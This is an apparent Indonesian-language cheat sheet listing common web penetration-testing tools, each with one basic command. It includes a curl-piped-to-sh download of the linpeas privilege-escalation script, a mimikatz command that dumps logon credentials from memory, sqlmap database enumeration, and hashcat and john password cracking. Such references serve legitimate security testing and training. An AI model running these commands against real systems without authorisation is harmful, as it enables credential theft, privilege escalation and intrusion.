Memuat data...
Memuat data...
Koleksi perkakas (tools) dan perintah dasar yang paling sering digunakan dalam kegiatan pengujian keamanan website dan aplikasi.
Directory and DNS brute-forcer.
gobuster dir -u http://<url> -w /path/to/wordlist.txtWeb vulnerability scanner and interception proxy.
Buka Burp Suite > Atur FoxyProxy > Intercept OnAutomatic SQL injection and database takeover tool.
sqlmap -u "http://<url>?id=1" --dbs --batchWeb path scanner for brute-forcing directories.
dirsearch -u http://<url> -e php,html,jsLinux Privilege Escalation Awesome Script.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | shExtract plaintexts passwords, hash, PIN code and kerberos tickets from memory.
privilege::debug sekurlsa::logonpasswordsWorld's fastest and most advanced password recovery utility.
hashcat -m 0 -a 0 hash.txt wordlist.txtFast password cracker, available for many flavors of Unix, Windows, and more.
john --wordlist=rockyou.txt hash.txt